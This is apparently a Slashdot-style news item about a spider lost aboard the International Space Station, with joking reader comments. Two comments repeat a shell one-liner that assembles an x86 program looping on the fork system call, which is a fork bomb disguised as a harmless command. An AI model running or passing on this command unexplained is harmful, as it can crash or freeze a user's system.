Spider Missing After Trip To Space Station
Garabito writes "A spider that had been sent to the International Space Station for a school science program was lost. Two arachnids were sent in order to know if spiders can survive and make webs in space, but now only one spider can be seen in the container. NASA isn't sure where the other spider could have gone. I, for one, welcome our new arachnid overlords."
Maybe they are just rocket scientists rather than people who post on the internet on the best way to resolve possible cases of spider cannibalism.
Bark for modpoints! BARK FOR MODPOINTS!
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;
It's good you're here to fight the meta thing by commenting on it.
echo -e 'global _start\n _start:\n mov eax, 2\n int 80h\n jmp _start' > a.asm; nasm a.asm -f elf; ld a.o -o a;